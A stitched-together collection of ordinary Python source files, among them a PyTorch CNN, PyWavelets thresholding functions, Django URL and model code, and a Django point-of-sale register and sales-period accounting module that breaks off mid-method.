    print(permutation_multiples(6))


if __name__ == "__main__":
    main()
|
nilq/baby-python
|
python
|
import pandas as pd
from estimators.FuzzyFlow import FuzzyFlow
# Driver script: fit a FuzzyFlow estimator on a sampled CPU-utilisation trace.
fuzzy = FuzzyFlow()
# First CSV column is a datetime index; only the first 3000 rows are used.
dat = pd.read_csv('../sampling_617685_metric_10min_datetime.csv',parse_dates=True,index_col=0)[:3000]
# Keep just the cpu_rate column, rounded to 3 decimals, as a Series.
dat = pd.Series(dat['cpu_rate'].round(3))
fuzzy.fit_transform(dat)
|
nilq/baby-python
|
python
|
# Read whitespace-separated integers from the user and print only the even ones.
input_str = input("Enter a list of elements: ")
evens = [number for number in map(int, input_str.split()) if number % 2 == 0]
print(evens)
|
nilq/baby-python
|
python
|
"""
URLconf for ``access_log`` app.
"""
# Prefix URL names with the app name. Avoid URL namespaces unless it is likely
# this app will be installed multiple times in a single project.
from django.conf.urls import include, patterns, url
# Old-style (Django < 1.10) string-view ``patterns()`` URLconf; both routes
# resolve to ``access_log.views.downloads``.
urlpatterns = patterns(
    'access_log.views',
    # Downloads filtered by content type only.
    url(r'^downloads/(?P<content_type>\d+)/$',
        'downloads',
        name='access_log_downloads'),
    # Downloads for a single object of that content type.
    # NOTE(review): this reuses the same ``name`` as the pattern above, so
    # reverse() can only target one of them — confirm this is intentional.
    url(r'^downloads/(?P<content_type>\d+)/(?P<object_id>\d+)/$',
        'downloads',
        name='access_log_downloads'),
)
|
nilq/baby-python
|
python
|
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
    """Convolutional network with a three-layer fully connected head
    producing 30 outputs.

    NOTE(review): ``forward`` calls ``x.cuda()`` unconditionally, so this
    model can only run on a CUDA-capable machine — confirm intended.
    """
    def __init__(self):
        super(Net, self).__init__()
        # Each conv stage: conv -> batchnorm -> (optional maxpool) -> dropout -> ReLU.
        self.conv1 = nn.Sequential(
            nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=3, padding=0),
            nn.BatchNorm2d(64),
            nn.MaxPool2d(kernel_size=3, stride=2),
            nn.Dropout2d(0.5),
            nn.ReLU(inplace=True)
        )
        self.conv2 = nn.Sequential(
            nn.Conv2d(in_channels=64, out_channels=256, kernel_size=5, stride=1, padding=0),
            nn.BatchNorm2d(256),
            nn.MaxPool2d(kernel_size=3, stride=2),
            nn.Dropout2d(0.5),
            nn.ReLU(inplace=True)
        )
        self.conv3 = nn.Sequential(
            nn.Conv2d(in_channels=256, out_channels=400, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(400),
            nn.Dropout2d(0.5),
            nn.ReLU(inplace=True)
        )
        self.conv4 = nn.Sequential(
            nn.Conv2d(in_channels=400, out_channels=576, kernel_size=3, stride=1, padding=1),
            nn.BatchNorm2d(576),
            nn.Dropout2d(0.5),
            nn.ReLU(inplace=True)
        )
        # NOTE(review): conv5 is constructed but never applied in forward()
        # below — confirm whether it should run before flattening.
        self.conv5 = nn.Sequential(
            nn.Conv2d(in_channels=576, out_channels=1024, kernel_size=3, stride=1, padding=0),
            nn.BatchNorm2d(1024),
            nn.Dropout2d(0.5),
            nn.ReLU(inplace=True)
        )
        # Earlier head sizes kept for reference:
        # self.fc1 = nn.Linear(12544, 3136)
        # self.fc2 = nn.Linear(3136, 392)
        # self.fc3 = nn.Linear(392, 1)
        # 14400 must match the flattened feature size for the expected input
        # resolution — TODO confirm against the training pipeline.
        self.fc1 = nn.Linear(14400, 1440)
        self.fc2 = nn.Linear(1440, 144)
        self.fc3 = nn.Linear(144, 30)
    def forward(self, x):
        """Run conv1..conv4, flatten, then the fully connected head.

        Moves the input to the GPU first; returns a (batch, 30) tensor.
        """
        x = x.cuda()
        x = self.conv1(x)
        x = self.conv2(x)
        x = self.conv3(x)
        x = self.conv4(x)
        x = x.view(-1, self.num_flat_features(x))
        x = F.relu(self.fc1(x), inplace=True)
        x = F.relu(self.fc2(x), inplace=True)
        x = self.fc3(x)
        return x
    def num_flat_features(self, x):
        """Return the per-sample feature count when ``x`` is flattened
        (product of all non-batch dimensions)."""
        size = x.size()[1:]  # all dimensions except the batch dimension
        num_features = 1
        for s in size:
            num_features *= s
        return num_features
|
nilq/baby-python
|
python
|
# Public API of the authentication package.
__all__ = [
    "AuthenticationViewDjangoMixin",
    "AuthenticationViewMixin",
    "AuthenticationViewRestMixin",
    "Authenticator",
]
from .authenticator import Authenticator
from .views import AuthenticationViewDjangoMixin, AuthenticationViewMixin, AuthenticationViewRestMixin
|
nilq/baby-python
|
python
|
# Copyright (c) 2006-2012 Filip Wasilewski <http://en.ig.ma/>
# Copyright (c) 2012-2016 The PyWavelets Developers
# <https://github.com/PyWavelets/pywt>
# See COPYING for license details.
"""
The thresholding helper module implements the most popular signal thresholding
functions.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['threshold']
import numpy as np
def soft(data, value, substitute=0):
    """Soft-threshold ``data``: shrink each entry toward zero by ``value`` and
    replace entries whose magnitude is below ``value`` with ``substitute``.

    Supports both real and complex input.
    """
    arr = np.asarray(data)
    mags = np.absolute(arr)
    # A zero magnitude yields inf here; the clip below removes it, so the
    # divide-by-zero warning can safely be silenced.
    with np.errstate(divide='ignore'):
        shrink = 1 - value / mags
    shrink.clip(min=0, max=None, out=shrink)
    shrunk = arr * shrink
    if substitute == 0:
        return shrunk
    below = np.less(mags, value)
    return np.where(below, substitute, shrunk)
def hard(data, value, substitute=0):
    """Hard-threshold ``data``: entries whose magnitude is below ``value``
    become ``substitute``; all other entries pass through unchanged."""
    arr = np.asarray(data)
    small = np.absolute(arr) < value
    return np.where(small, substitute, arr)
def greater(data, value, substitute=0):
    """Keep entries greater than or equal to ``value``; replace the rest with
    ``substitute``.

    Raises:
        ValueError: for complex input, which has no natural ordering.
    """
    arr = np.asarray(data)
    if np.iscomplexobj(arr):
        raise ValueError("greater thresholding only supports real data")
    return np.where(arr < value, substitute, arr)
def less(data, value, substitute=0):
    """Keep entries less than or equal to ``value``; replace the rest with
    ``substitute``.

    Raises:
        ValueError: for complex input, which has no natural ordering.
    """
    arr = np.asarray(data)
    if np.iscomplexobj(arr):
        raise ValueError("less thresholding only supports real data")
    return np.where(arr > value, substitute, arr)
# Dispatch table mapping the mode names accepted by ``threshold`` to the
# corresponding implementation above.
thresholding_options = {'soft': soft,
                        'hard': hard,
                        'greater': greater,
                        'less': less}
def threshold(data, value, mode='soft', substitute=0):
    """
    Thresholds the input data depending on the mode argument.
    In ``soft`` thresholding, data values with absolute value less than
    `param` are replaced with `substitute`. Data values with absolute value
    greater or equal to the thresholding value are shrunk toward zero
    by `value`. In other words, the new value is
    ``data/np.abs(data) * np.maximum(np.abs(data) - value, 0)``.
    In ``hard`` thresholding, the data values where their absolute value is
    less than the value param are replaced with `substitute`. Data values with
    absolute value greater or equal to the thresholding value stay untouched.
    In ``greater`` thresholding, the data is replaced with `substitute` where
    data is below the thresholding value. Greater data values pass untouched.
    In ``less`` thresholding, the data is replaced with `substitute` where data
    is above the thresholding value. Lesser data values pass untouched.
    Both ``hard`` and ``soft`` thresholding also support complex-valued data.
    Parameters
    ----------
    data : array_like
        Numeric data.
    value : scalar
        Thresholding value.
    mode : {'soft', 'hard', 'greater', 'less'}
        Decides the type of thresholding to be applied on input data. Default
        is 'soft'.
    substitute : float, optional
        Substitute value (default: 0).
    Returns
    -------
    output : array
        Thresholded array.
    Examples
    --------
    >>> import numpy as np
    >>> import pywt
    >>> data = np.linspace(1, 4, 7)
    >>> data
    array([ 1. ,  1.5,  2. ,  2.5,  3. ,  3.5,  4. ])
    >>> pywt.threshold(data, 2, 'soft')
    array([ 0. ,  0. ,  0. ,  0.5,  1. ,  1.5,  2. ])
    >>> pywt.threshold(data, 2, 'hard')
    array([ 0. ,  0. ,  2. ,  2.5,  3. ,  3.5,  4. ])
    >>> pywt.threshold(data, 2, 'greater')
    array([ 0. ,  0. ,  2. ,  2.5,  3. ,  3.5,  4. ])
    >>> pywt.threshold(data, 2, 'less')
    array([ 1. ,  1.5,  2. ,  0. ,  0. ,  0. ,  0. ])
    """
    # EAFP dispatch: an unknown mode raises KeyError on lookup, which is
    # converted into the user-facing ValueError below.
    try:
        return thresholding_options[mode](data, value, substitute)
    except KeyError:
        # Make sure error is always identical by sorting keys
        keys = ("'{0}'".format(key) for key in
                sorted(thresholding_options.keys()))
        raise ValueError("The mode parameter only takes values from: {0}."
                         .format(', '.join(keys)))
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from flask_mongoengine import Document
from mongoengine import CASCADE
from mongoengine.fields import LazyReferenceField, BooleanField, StringField
from mpcontribs.api.contributions.document import Contributions
class Cards(Document):
    """MongoDB document for the embeddable HTML "card" generated for a
    contribution (stored in the ``cards`` collection)."""
    # One-to-one with the contribution (primary key); deleting the
    # contribution cascades to its card.
    contribution = LazyReferenceField(
        Contributions,
        passthrough=True,
        reverse_delete_rule=CASCADE,
        primary_key=True,
        # NOTE(review): says "table" but this is the cards document — looks
        # copy/pasted from the tables module; confirm before changing.
        help_text="contribution this table belongs to",
    )
    # Visibility flag; indexed via ``meta`` below.
    is_public = BooleanField(
        required=True, default=False, help_text="public or private card"
    )
    # Pre-rendered HTML snippet served to clients.
    html = StringField(required=True, default="", help_text="embeddable html code")
    meta = {"collection": "cards", "indexes": ["is_public"]}
|
nilq/baby-python
|
python
|
from collections import defaultdict
from django.conf import settings
from django.db import transaction, IntegrityError, models
from django.db.models import Q, Sum
from django.utils import timezone
from article.models import ArticleType
from money.models import Money, Decimal, Denomination, CurrencyData, Currency, MoneyField
from sales.models import TransactionLine, Transaction
from stock.models import StockChange, StockChangeSet
from stock.stocklabel import StockLabeledLine
from swipe.settings import CASH_PAYMENT_TYPE_NAME
from tools.management.commands.consistencycheck import consistency_check, CRITICAL
from tools.util import raiseif
class PaymentType(models.Model):
    """A way customers can pay (e.g. cash or invoicing)."""
    # Name of the payment type. "Cash" is always used when using cash registers. Should not be changed.
    name = models.CharField(max_length=255, unique=True)
    # Is used for invoicing. If enabled, the cost is to be used at a later date. Should not be changed.
    is_invoicing = models.BooleanField(default=False)
    def __str__(self):
        return "{}".format(self.name)
class Register(models.Model):
    """
    A register. This can be a cash register with denominations or a virtual register that accepts money
    in a general sense
    """
    # Name of the register. Cosmetic
    class Meta:
        permissions = (
            # Permission to allow linking customers to users via the swipe web interface.
            ("open_register", "Can open a register"),
            ("close_register", "Can close a register"),
        )
    name = models.CharField(max_length=255, unique=True)
    # Currency used for this register. Unchangeable
    currency = models.ForeignKey(CurrencyData, on_delete=models.PROTECT)
    # Indicates if register accepts cash or otherwise is a digital register
    is_cash_register = models.BooleanField(default=False)
    # Do we use this register right now?(Non-active registers should be empty)
    is_active = models.BooleanField(default=True)
    # How do people pay in this register?
    payment_type = models.ForeignKey(PaymentType, on_delete=models.PROTECT)
    def get_denominations(self):
        """Return the denominations for this register's currency (empty list
        for non-cash registers)."""
        # Gets denominations from register based on its currency
        if self.is_cash_register:
            return Denomination.objects.filter(currency=self.currency)
        else:
            return []
    def is_open(self):
        """Return True when this register has an opening count in the
        currently open sales period; raise IntegrityError on bad state."""
        # Checks if the register is in an opened state
        sales_period = SalesPeriod.objects.filter(endTime__isnull=True)
        if len(sales_period) > 1:
            raise IntegrityError("More than one salesperiod opened")
        elif len(sales_period) == 1:
            counts = RegisterCount.objects.filter(sales_period=sales_period[0], register=self)
            # Zero counts means never opened this period; two means it was
            # already opened and closed again.
            if len(counts) == 0 or len(counts) > 1:
                return False
            else:
                if counts[0].is_opening_count:
                    return True
                else:
                    raise IntegrityError("The only count for the opened sales period is a closing count")
        else:
            return False
    def get_prev_closing_count(self):
        """Return the Money value of this register's most recent closing
        count, or a zero Money when no closing count exists yet."""
        # Get this registers previous count when it was closed.
        # This shouldn't be used for Brief Registers; they should start at zero instead.
        count_exists = RegisterCount.objects.filter(is_opening_count=False, register=self).exists()
        if not count_exists:
            # Dummy the count
            return Money(currency=Currency(self.currency.iso), amount=Decimal("0.00000"))
        last_count = RegisterCount.objects.filter(is_opening_count=False,
                                                  register=self).order_by('sales_period__beginTime').last()
        denoms = DenominationCount.objects.filter(register_count=last_count)
        # NOTE(review): local name shadows the builtin ``sum``; returns None
        # when the closing count has no denomination counts — confirm callers
        # handle that.
        sum = None
        for denom in denoms:
            if not sum:
                sum = denom.get_money_value()
            else:
                sum += denom.get_money_value()
        return sum
    @property
    def denomination_counts(self):
        """Denomination counts attached to this register's latest count
        (empty list when the register was never counted)."""
        if RegisterCount.objects.filter(register=self).exists():
            return DenominationCount.objects.filter(register_count=RegisterCount.objects.filter(register=self).
                                                    latest('time_created'))
        else:
            return []
    @transaction.atomic
    def open(self, counted_amount, memo="", denominations=None):
        """Open this register (creating a SalesPeriod if none is open).

        :param counted_amount: counted opening amount; for cash registers it
            must equal the sum of the denomination counts
        :param memo: optional free-form note ("" is normalised to None)
        :param denominations: list of DenominationCount for cash registers
        :return: the saved opening RegisterCount
        :raises AlreadyOpenError: when the register is already open
        :raises InactiveError: when the register is not active
        """
        # Opens a register, opens a registerperiod if neccessary
        if denominations is None:
            denominations = []
        if memo == "":
            memo = None
        if self.is_active:
            if self.is_open():
                raise AlreadyOpenError("Register is already open")
            else:
                # Calculate Cash Register Difference
                if self.is_cash_register:
                    count = None
                    for denomination_count in denominations:
                        if count is None:
                            count = denomination_count.get_money_value()
                        else:
                            count += denomination_count.get_money_value()
                    # Without denominations, the value is equal to 0
                    # This prevents an error when denomination count is empty
                    # Failure will occur however, if the opening count is non-zero as no counts means that
                    # there is a difference between counted_amount and denomination counts
                    if len(denominations) == 0:
                        count = Money(amount=Decimal(0), currency=Currency(self.currency.iso))
                    diff = count - self.get_prev_closing_count()
                # Get or create SalesPeriod
                if RegisterMaster.sales_period_is_open():
                    open_sales_period = RegisterMaster.get_open_sales_period()
                else:
                    open_sales_period = SalesPeriod()
                    open_sales_period.save()
                # Create cash register
                if self.is_cash_register:
                    reg_count = RegisterCount(is_opening_count=True, register=self, sales_period=open_sales_period,
                                              amount=counted_amount)
                    used_denominations = set()
                    # Verify the denomination counts add up to counted_amount.
                    for denomination_count in denominations:
                        counted_amount -= denomination_count.number * denomination_count.denomination.amount
                        used_denominations.add(denomination_count.denomination)
                    raiseif(counted_amount != Decimal("0.00000"),
                            RegisterCountError, "denominations amounts did not add up.")
                    reg_count.save(denominations=denominations)
                    for denomination_count in denominations:
                        denomination_count.register_count = reg_count
                    # Pad with zero-counts so every denomination is recorded.
                    all_denominations = Denomination.objects.filter(currency__register=self)
                    for den in all_denominations:
                        if den not in used_denominations:
                            denominations.append(DenominationCount(number=0, denomination=den,
                                                                   register_count=reg_count))
                    for denomination_count in denominations:
                        denomination_count.save()
                else:  # Create Brief Register
                    # Optional: Disallow opening with no value
                    reg_count = RegisterCount(is_opening_count=True, amount=counted_amount,
                                              register=self, sales_period=open_sales_period)
                    reg_count.save()
                # Set diff to zero, may change later on
                if not self.is_cash_register:
                    diff = Money(amount=counted_amount, currency=Currency(self.currency.iso))
                # Save Register Count Difference
                # noinspection PyUnboundLocalVariable
                OpeningCountDifference.objects.create(register_count=reg_count, difference=diff)
                return reg_count
        else:
            raise InactiveError("The register is inactive and cannot be opened")
    def close(self, indirect=False, register_count=None, denomination_counts=None):
        """
        :param indirect: must be True; closing happens via the sales-period close
        :param register_count: the closing count for this register
        :type register_count: RegisterCount
        :param denomination_counts: denomination breakdown of the closing count
        :type denomination_counts: List[DenominationCount]
        :return:
        """
        # Closes a register, should always be called indirectly via registermaster
        if denomination_counts is None:
            denomination_counts = []
        if not indirect:
            raise InvalidOperationError("You can only close a register when the entire sales period is closed")
        else:
            if not self.is_open():
                raise AlreadyClosedError("Register is already closed")
            else:
                # Opened register means opened sales period
                opened_sales_period = SalesPeriod.get_opened_sales_period()
                reg_count = RegisterCount.objects.filter(register=self, sales_period=opened_sales_period)
                if len(reg_count) > 1:
                    raise IntegrityError("Register is either opened twice or already closed.")
                elif len(reg_count) == 0:
                    raise IntegrityError("Register is apparantly not opened but function indicated that it was.")
                else:
                    register_count.sales_period = opened_sales_period
                    if register_count.register_id != self.id:
                        raise InvalidInputError("Registercount's register does not match register")
                    if register_count.is_opening_count:
                        raise InvalidInputError("Registercount should be closing and connected to salesperiod")
                    # NOTE(review): denomination validation only runs for
                    # non-cash registers here — looks inverted; confirm.
                    if not self.is_cash_register:
                        for denom in denomination_counts:
                            raiseif(denom.denomination.currency_id != self.currency_id, InvalidInputError,
                                    "Denomination does not have correct currency")
                            raiseif(denom.register_count.register_id != self.id, InvalidInputError,
                                    "Denominationcount and register don't match")
                    register_count.save()
                    for denom in denomination_counts:
                        denom.register_count = register_count
                        denom.save()
    def save(self, **kwargs):
        """Persist the register, enforcing that cash registers use the cash
        payment type. NOTE(review): ``kwargs`` are not forwarded to super()."""
        if self.is_cash_register:
            raiseif(self.payment_type.name != CASH_PAYMENT_TYPE_NAME, CurrencyTypeMismatchError,
                    "Payment type name did not match the provided preset. Use {} instead".format(
                        CASH_PAYMENT_TYPE_NAME))
        super(Register, self).save()
    def __str__(self):
        return "Name: {}, Currency: {}, is_cash_register: {}, is_active: {}, Payment Method: {}".\
            format(self.name, self.currency.name, self.is_cash_register, self.is_active, self.payment_type.name)
class RegisterMaster:
    """
    A helper class that can do the necessary checks to see the state of the registers. Also, some commands can be given
    """
    @staticmethod
    def sales_period_is_open():
        # Truthy check: returns the open SalesPeriod itself, or False.
        return RegisterMaster.get_open_sales_period()
    @staticmethod
    def get_open_sales_period():
        """Return the single open sales period, or False when none is open."""
        try:
            a = SalesPeriod.objects.get(endTime__isnull=True)
        except SalesPeriod.DoesNotExist:
            return False
        return a
    @staticmethod
    def number_of_open_registers():
        # Retrieves the number of open registers, 0 when period is closed and error when inconsistent
        return RegisterCount.objects.filter(sales_period__endTime__isnull=True, is_opening_count=True).count()
    @staticmethod
    def get_open_registers():
        # Returns all open registers
        return Register.objects.filter(registercount__sales_period__endTime__isnull=True,
                                       registercount__is_opening_count=True).distinct()
    @staticmethod
    def get_payment_types_for_open_registers():
        # Returns the set of payment types that are possible in the open register period
        return PaymentType.objects.filter(register__registercount__sales_period__endTime__isnull=True,
                                          register__registercount__is_opening_count=True).distinct()
    @staticmethod
    def get_last_closed_register_counts():
        """Return a queryset of the latest closing count of every register
        that is not currently open."""
        # Very inefficient. If you can do this better, please do
        is_open = RegisterMaster.sales_period_is_open()
        closed_register_counts = []
        if not is_open:
            closed_registers = Register.objects.all()
        else:
            open_regs = RegisterMaster.get_open_registers()
            closed_registers = set(Register.objects.all())
            # NOTE(review): loop variable shadows the builtin ``open``.
            for open in open_regs:
                closed_registers.remove(open)
        for register in closed_registers:
            counts = RegisterCount.objects.filter(register=register,
                                                  is_opening_count=False)
            if len(counts) > 0:
                closed_register_counts.append(counts.latest('time_created'))
        closed_register_counts_ids = []
        for reg in closed_register_counts:
            closed_register_counts_ids.append(reg.id)
        return RegisterCount.objects.filter(id__in=closed_register_counts_ids)
    @staticmethod
    # Gets the last register count for each register, dummied for registers without counts
    def get_last_register_counts():
        registers = Register.objects.all()
        counts = []
        for register in registers:
            count_exists = RegisterCount.objects.filter(register=register).exists()
            if count_exists:
                counts.append(RegisterCount.objects.filter(register=register).latest('time_created'))
            else:
                # Unsaved placeholder count (sales_period_id=-1) for display.
                counts.append(RegisterCount(register=register, sales_period_id=-1, is_opening_count=False,
                                            amount=Decimal("0"),
                                            time_created=timezone.now()))
        return counts  # type: List[RegisterCount]
class ConsistencyChecker:
    """
    Checks the consistency of the system. Will raise IntegrityErrors if the system is an inconsistent state.
    Fixes are required if any of these tests fail
    """
    # This test runs the tests, but rather than raising an error it appends the errors to an array
    @staticmethod
    @consistency_check
    def non_crashing_full_check():
        """Run every check, collecting failures as error dicts instead of
        raising; returns the (possibly empty) list of errors."""
        errors = []
        try:
            ConsistencyChecker.check_open_sales_periods()
        except IntegrityError:
            errors.append({
                "text": "More than one sales period is open",
                "location": "SalesPeriods",
                "line": -1,
                "severity": CRITICAL
            })
        try:
            ConsistencyChecker.check_open_register_counts()
        except IntegrityError:
            errors.append({
                "text": "Register has more register counts opened in an opened sales period than possible",
                "location": "SalesPeriods",
                "line": -1,
                "severity": CRITICAL
            })
        try:
            ConsistencyChecker.check_payment_types()
        except IntegrityError:
            errors.append({
                "text": "Cash register can only have cash as payment method",
                "location": "SalesPeriods",
                "line": -1,
                "severity": CRITICAL
            })
        return errors
    @staticmethod
    def full_check():
        """Run every check, raising IntegrityError on the first failure."""
        ConsistencyChecker.check_open_sales_periods()
        ConsistencyChecker.check_open_register_counts()
        ConsistencyChecker.check_payment_types()
    @staticmethod
    def check_open_sales_periods():
        # Checks if there is either one or zero open sales periods
        active_salesperiods = SalesPeriod.objects.filter(endTime__isnull=True)
        if len(active_salesperiods) > 1:
            raise IntegrityError("More than one sales period is open")
    @staticmethod
    def check_open_register_counts():
        # Checks if register is opened at most once
        relevant_register_counts = RegisterCount.objects.filter(sales_period__endTime__isnull=True)
        a = set()
        for count in relevant_register_counts:
            if count.register_id in a:
                raise IntegrityError("Register is opened and closed while Sales period is still open")
            else:
                a.add(count.register_id)
    @staticmethod
    def check_payment_types():
        # Checks for valid payment types. Currently it checks if cash register only hold cash
        # NOTE(review): reads django.conf settings here while Register.save
        # uses swipe.settings.CASH_PAYMENT_TYPE_NAME — confirm both resolve
        # to the same value.
        registers = Register.objects.all()
        for register in registers:
            if register.is_cash_register and register.payment_type.name != settings.CASH_PAYMENT_TYPE_NAME:
                raise IntegrityError("Cash register can only have cash as payment method")
class SalesPeriod(models.Model):
    """
    A general period in which transactions on opened registers can take place
    """
    # When does the sales period start?
    beginTime = models.DateTimeField(auto_now_add=True)
    # When does the sales period end?(null indicates not ended)
    endTime = models.DateTimeField(null=True)
    # Any relevant information a user wants to add?
    closing_memo = models.CharField(max_length=255, default=None, null=True)
    @classmethod
    def create(cls, *args, **kwargs):
        """Alternate constructor: build an unsaved instance."""
        return cls(*args, **kwargs)
    def is_opened(self):
        # Open iff endTime has not been set.
        return not self.endTime
    @staticmethod
    def get_opened_sales_period():
        """
        Gets the opened salesperiod. If there is none or there are multiple, Django will throw an exception.
        :return:
        """
        return SalesPeriod.objects.get(endTime__isnull=True)
    @staticmethod
    @transaction.atomic
    def close(
            registercounts_denominationcounts,
            memo: str=None):
        """
        Closes a sales period by closing all the opened registers. Requires the totals to be filled in.
        :param registercounts_denominationcounts:
        :type registercounts_denominationcounts: list[tuple[RegisterCount, list[DenominationCount]]]
        :param memo:
        :return: the closed SalesPeriod on success, or a list with a single
            error when the period was already closed / registers are uncounted
        :raises SalesPeriodCloseError: when any per-register validation fails
        """
        # early return when register is closed
        if not RegisterMaster.sales_period_is_open():
            return [AlreadyClosedError("Salesperiod is already closed")]
        if not memo:
            memo = None  # ensure memo is None when None or "" or otherwise empty string
        open_registers = set(RegisterMaster.get_open_registers())
        unchecked = set(open_registers)
        errors = []
        # Per-currency running totals: counted amounts minus sales and in/outs.
        totals = defaultdict(lambda: Decimal(0))
        for (registercount, denominationcounts) in registercounts_denominationcounts:
            registercount.is_opening_count = False
            amount = registercount.amount
            register = registercount.register
            # let's already add the counted amount to the currency so that we don't have to do that later on
            totals[register.currency.iso] += amount
            if register.is_cash_register:
                # check if denominations have valid amounts
                if not denominationcounts:
                    errors.append(InvalidDenominationList(
                        "Register {} should have denomination counts attached, but doesn't.".format(register.name)
                    ))
                    break
                denom_amount = Decimal(0)
                for denom_count in denominationcounts:
                    if denom_count.number < 0:
                        errors.append(NegativeCountError(
                            "Register {} has an invalid denomination count for {}{}".format(
                                register.name,
                                denom_count.denomination.currency,
                                denom_count.denomination.amount,
                            )
                        ))
                        break
                    denom_count.register_count = registercount
                    denom_amount += denom_count.get_money_value().amount
                if denom_amount != amount:
                    errors.append(InvalidDenominationList("List not equal to expected count: {}, count: {}. "
                                                          "Result: {}".format(denominationcounts,
                                                                              registercount, denom_amount)))
                    break
            # now that we're done with checking the register's data, we can pop the register from the list.
            if register in unchecked:
                unchecked.remove(register)
            else:
                errors.append(InvalidOperationError("Register {} is not available in the list of "
                                                    "unchecked registers.".format(register.name)))
        if errors:
            raise SalesPeriodCloseError(errors=errors)
        if len(unchecked) > 0:
            return [InvalidOperationError("There are some uncounted registers, please count them")]
        sales_period = RegisterMaster.get_open_sales_period()
        # Subtract everything sold and every manual in/out from the counted
        # totals; what remains is the unexplained difference per currency.
        tlines = TransactionLine.objects.filter(transaction__salesperiod=sales_period)
        for tline in tlines:
            totals[tline.price.currency.iso] -= tline.price.amount
        in_outs = MoneyInOut.objects.filter(sales_period=sales_period).select_related('register__currency')
        for in_out in in_outs:
            totals[in_out.register.currency.iso] -= in_out.amount
        for (registercount, denom_counts) in registercounts_denominationcounts:
            register = registercount.register  # type: Register
            register.close(indirect=True, register_count=registercount, denomination_counts=denom_counts)
        for diff in totals:
            close = ClosingCountDifference(sales_period=sales_period,
                                           difference=Money(currency=Currency(diff), amount=totals[diff]))
            close.save()
        sales_period.endTime = timezone.now()
        sales_period.save()
        return sales_period
    def __str__(self):
        return "Begin time: {}, End time: {}".format(self.beginTime, self.endTime)
class RegisterCount(models.Model):
    """
    The amount of currency and perhaps the denomination in the case of a cash register is stored here
    """
    # A register period has one or two counts
    register = models.ForeignKey(Register, on_delete=models.PROTECT)
    # The salesperiod of the count
    sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
    # Indicates if this the opening or the closing count
    is_opening_count = models.BooleanField()
    # How much money is there at the moment of counting?
    amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=-1.0)
    # Time at which the registercount was created(otherwise it's really to hard to find the latest one)
    time_created = models.DateTimeField(auto_now_add=True, null=True)
    def save(self, *args, **kwargs):
        """Validate the optional ``denominations=...`` kwarg against this
        register's currency before saving.

        NOTE(review): args/kwargs are not forwarded to ``super().save()``.
        """
        denominations = []
        if 'denominations' in kwargs:
            denominations = kwargs['denominations']
        if self.register.is_cash_register:
            # Put all denominations for currency in a hashmap
            denoms_for_register = Denomination.objects.filter(currency=self.register.currency)
            all_denoms = {}
            for denom in denoms_for_register:
                all_denoms[str(denom.amount)] = 1
            # For all denominationcounts
            for denom_count in denominations:
                # Assert every denomination is available exactly once
                if all_denoms.pop(str(denom_count.denomination.amount), 0) == 0:
                    raise InvalidDenominationList("Denominations invalid (Unexpected Denom): GOT {}, EXPECTED {}. "
                                                  "Crashed at {} || {}".format(denominations, denoms_for_register,
                                                                               denom_count.denomination.amount,
                                                                               all_denoms))
        else:
            raiseif(denominations, RegisterInconsistencyError, "non-cash registers should not have denominations")
        super().save()
    @classmethod
    def create(cls, *args, **kwargs):
        """Alternate constructor: build an unsaved instance."""
        return cls(*args, **kwargs)
    def is_cash_register_count(self):
        # Delegates to the owning register.
        return self.register.is_cash_register
    def get_amount_from_denominationcounts(self):
        """Sum this count's denomination lines.

        NOTE(review): the loop adds Money values onto a Decimal accumulator —
        presumably Money supports that; verify the returned type.
        """
        # Distills an amount value from the denomination counts
        denom_counts = DenominationCount.objects.filter(register_count=self)
        if len(denom_counts) > 0:
            amount = Decimal(0)
            for count in denom_counts:
                amount += count.get_money_value()
            return amount
        else:
            return Decimal(0)
    def __str__(self):
        return "Register:{}, is_opening_count:{}, Amount:{}".\
            format(self.register_id, self.is_opening_count, self.amount)
class DenominationCount(models.Model):
    """
    Counting of the denominations in a cash register
    """
    # Every cash register count needs to count all of its denominations, amongst which is 'self'
    register_count = models.ForeignKey(RegisterCount, on_delete=models.PROTECT)
    # Denomination belonging to the currency of this register
    denomination = models.ForeignKey(Denomination, on_delete=models.PROTECT)
    # Number of pieces of denomination
    number = models.IntegerField()
    def get_money_value(self):
        """Money value of this line: denomination amount times piece count."""
        return Money(self.denomination.amount, Currency(self.denomination.currency.iso)) * int(self.number)
    @classmethod
    def create(cls, *args, **kwargs):
        """Alternate constructor: build an unsaved instance."""
        return cls(*args, **kwargs)
    def __str__(self):
        return "{} {} x {} @ RegCount {}".format(self.denomination.currency, self.denomination.amount, self.number,
                                                 self.register_count_id)
class MoneyInOut(models.Model):
    """
    Adds money to a register during an open register period
    """
    # Register to which
    register = models.ForeignKey(Register, on_delete=models.PROTECT)
    # Salesperiod where in/out took place
    sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
    # Positive: ADD, negative: REMOVE moneys
    amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=0.0)
    def __str__(self):
        return "Register:{}, Sales Period: {}, Amount:{}".format(self.register_id, self.sales_period_id, self.amount)
    def save(self, force_insert=False, force_update=False, using=None,
             update_fields=None):
        """On first save, default the sales period to the currently opened
        one. NOTE(review): the keyword args are not forwarded to super()."""
        if not self.id:
            if not hasattr(self, 'sales_period') or not self.sales_period:
                self.sales_period = SalesPeriod.get_opened_sales_period()
            super(MoneyInOut, self).save()
        else:
            super(MoneyInOut, self).save()
class SalesPeriodDifference(models.Model):
    """
    Resolves differences between expected amounts of money in the combined opened registers and the actual
    amount of money. Count is per type of money
    """
    # Period in which there is a difference
    sales_period = models.ForeignKey(SalesPeriod, on_delete=models.PROTECT)
    # Currency of the difference
    currency_data = models.ForeignKey(CurrencyData, on_delete=models.PROTECT)
    # Amount of difference
    amount = models.DecimalField(max_digits=settings.MAX_DIGITS, decimal_places=settings.DECIMAL_PLACES, default=0.0)
class OpeningCountDifference(models.Model):
    """Money that (dis)appeared between closing and re-opening a register."""
    # Difference that can occur when a register is opened. This indicated that money (dis)appeared between closing and
    # opening of the register.
    difference = MoneyField()
    # Tied to exactly one opening RegisterCount.
    register_count = models.OneToOneField("RegisterCount", on_delete=models.PROTECT)
    def __str__(self):
